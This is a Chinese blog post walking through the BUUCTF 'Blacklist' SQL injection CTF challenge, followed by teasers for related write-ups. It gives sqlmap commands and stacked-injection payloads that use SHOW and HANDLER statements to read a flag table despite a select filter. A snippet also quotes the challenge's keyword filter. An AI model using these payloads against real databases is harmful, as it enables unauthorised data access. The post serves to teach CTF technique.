buuctf:blacklistp

最新推荐文章于 2025-04-16 14:52:51 发布
原创 最新推荐文章于 2025-04-16 14:52:51 发布 · 227 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章描述了一次针对靶机的SQL注入攻击过程,首先通过sqlmap发现注入点并确定数据库为supersqli,由于WAF的存在,无法继续使用工具,于是采用手工堆叠注入方法,暴露表名FlagHere和字段flag。由于select被过滤,使用handler读取了表FlagHere的数据。

打开靶机。在这里插入图片描述
我们输入1'闭合一下试试。

在这里插入图片描述
可以看到应该是sql注入。我们用sqlmap扫描一下。
命令:sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1
请添加图片描述
可以看到存在注入点。我们爆库。命令:

sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1 --dbs

请添加图片描述
可以看到爆出的数据库为:supersqli

往下的话就不能用sqlmap了因为有waf,我不会绕,我们手工注入。
已经知道数据库了,我们采用堆叠注入。爆表名:?inject=-1';use supersqli;show tables--+
后面的--+表示#的意思。
在这里插入图片描述
可以看到表名是FlagHere然后我们爆字段。?inject=-1';use supersqli;show columns from FlagHere--+
在这里插入图片描述
可以看到有一个flag字段。但是select被过滤了。无法继续堆叠注入。我们用handler读取。再知道表名是,可以用handler读取数据。格式为:handler 表名 open;handler 表名 read first;handler 表名 close;
所以我们payload:?inject=1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;
在这里插入图片描述
拿下。
养一下眼。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

寡人略秀
关注
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
weixin_44632787的博客
06-19 887
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询 启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀! 首先爆出数据库:1’;show databases; 然后爆出表名:1’; show tables; 然后显示某个表里面列的信息:1’;show columns from FlagHere; 接下来的才是重点,在MYSQL数据库中: 可以用handl
BUUCTF-WEB-[GYCTF2020]Blacklist
r1727337824的博客
08-29 943
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">
buuctf-[GYCTF2020]Blacklist sql堆叠注入
2202_75317918的博客
10-02 258
这题我一开始还以为是rce,但是看到注入框内写了1,那就肯定是sql。这里我想起了之前做的强网杯的随便住,也是被过滤了,然后使用的堆叠注入。语句访问,该表对象未被其他会话共享,并且在会话调用。可以通过指定的索引去访问数据。后面不晓得了,才知道有handler语句。表中,读取第一个索引记录,然后关闭。语句打开一个表,使其可以使用后续。1' 报错,更加确定是sql。发现select被过滤了。或会话终止之前不会关闭。
buuctf blacklist
ANYOUZHEN的博客
05-26 394
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1' 使用联合查询,构造payload: ?inject=1' union select 1,2--+ 过滤了许多东西: /set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i 其中的select被过滤掉了 尝试使用报错注入进行突破: ?inject=1' and extractvalue(1,concat(0x7e,(databa..
BUUCTF-Blacklist
m0_47571887的博客
11-10 778
前言: 这道题我之前的文章攻防世界-supersqli是一道一样的,只不过这题是个进阶版,还有get了一个新的注入方式。 首先打开题目,看到查询框我们进行注入 禁用了很多东西啊,但貌似show没有禁用,可以查询一下数据库还有表 这里看到flaghere,但rename被禁用掉了,所以不能通过更改表名来进行查询,这里就要用一个其他得到注入方法 1';handler FlagHere open; //打开FlagHere文件 handler FlagHere read first;
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1746
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
BUUCTF:Url编码
m0_62995661的博客
03-11 990
BUUCTF:Url编码
BUUCTF:[0CTF 2016]piapiapia
qq_46230755的博客
12-26 701
题目页面是一个登录页面。拿到题目第一步当然考虑一下有没有注入。当然经过几次测试答案是没有的。 利用工具扫一下是否存在其他的页面 果然扫到了一个www.zip 我们尝试一下进入注册的页面 注册一个admin 123456 进去里面看看,发现可以传东西,考虑是不是文件上传漏洞(事实证明没有) 随便传个东西,发现会跳转到另一个页面 回到一开始拿到的源码,发现config.php文件里存在flag,但是不可读 config(): <?php $config['hostname'] = '1.
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink)
weixin_51055545的博客
01-18 1372
Buuctf:【axb_2019_heap】(格式化字符串,of by null,unlink) 例行检查 64位,保护机制全开,IDA中分析 漏洞分析 此处edit()函数中会多写入\x00字节,导致溢出一个\x00字节,存在of by null 漏洞,add()中限制了我们申请堆块的大小,只能申请大于0x80的堆块 利用思路 1.利用格式化字符串漏洞泄露出程序基地址和libc基地址 2.利用unlink,通过unlink修改chunk0的内存地址为free_hook地址,再次edit0号堆块,覆写为s
BUUCTF:misc刷题记录
m0_74190241的博客
12-04 592
BUUCTF:misc刷题记录
buuctf-Blacklist
m0_62094846的博客
03-28 725
?inject=1' order by 2--+ 过滤了很多关键词,就有select,好像绕不过 试试报错注入 ?inject=1' and extractvalue(1,concat(0x7e,(database()),0x7e))--+ 数据库:surpersqli 因为过滤了太多,报错注入不了,只能试试别的了 堆叠注入 ?inject=-1';use supersqli;show tables--+ 查出两个表:FlagHere,words 接下来查字段...
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1765
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
Buuctf [GYCTF2020]Blacklist
qq_53030229的博客
10-26 482
文章目录一、知识拓展1、我在mi数据库中创建了一个数据表2、使用handler读取数据二、堆叠注入1、检查源码2、使用堆叠注入1、判断是否存在注入点2、使用堆叠注入3、获取flag 一、知识拓展 mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据 1、我在mi数据库中创建了一个数据表 2、使用handler读取数据 总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开 HANDLER
buuctf[GYCTF2020]Blacklist
qq_75005708的博客
04-25 268
如果使用别名打开表,使用其他 HANDLER 语句对打开的表的进一步引用必须使用别名,而不是表名。如果不使用别名,但使用由数据库名称限定的表名打开表,则进一步的引用必须使用不限定的表名。例如,使用 mydb.mytable 打开的表,进一步引用必须使用 mytable。和输入1的时候是一样的,看了wp之后发现其他的方法,运用HANDLER 语句。open是打开,read是开始读取的意思,close是结束的意思。是有一个1,我们查询之后会发现出现以上页面,我们再试一下1'然后我们就可以拿到我们的答案了。
buuctf [GYCTF2020]Blacklist
m0_63883187的博客
01-14 193
不懂得欢迎私信交流
WEB-buuctf-black list
weixin_52804141的博客
01-01 245
buuctf black list
BUUCTF[GYCTF2020]Blacklist
weixin_45253622的博客
05-22 474
sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过。 可用的还有,or and unionshow 输入:1 or 1=1 无反应 输入:1' or '1' ='1如下: 字符型注入,由于show可用,所以我们想到堆叠注入: 1';show tables; 查看字段名, 1';show columns from FlagHere; 过滤机制过于强大,所以我们使用handler, HANDLER...OPEN语句打开一个表,使其可以使用...
BUUCTF---web---[GYCTF2020]Blacklist
2201_75556700的博客
06-11 470
7、查看flag字段中的信息,select被过滤了。8、使用handler打开表,并读取表中第一个信息。2、测试单引号和双引号,单引号报错,双引号没报错。4、使用堆叠注入测试,查看数据库名。6、查看FlagHere中字段名。1、来到题目连接页面。
BUUCTF [GYCTF2020]Blacklist1
duchuan_的博客
04-16 535
初始页面。
BUUCTF:你竟然赶我走
最新发布
05-14
好的,我现在要帮助用户解决BUUCTF中的“你竟然赶我走”隐写术挑战。用户提到他们尝试了stegsolve和010editor但没找到flag,可能flag藏在图片属性备注里。根据引用中的信息,特别是引用[4]提到有些题会直接把flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值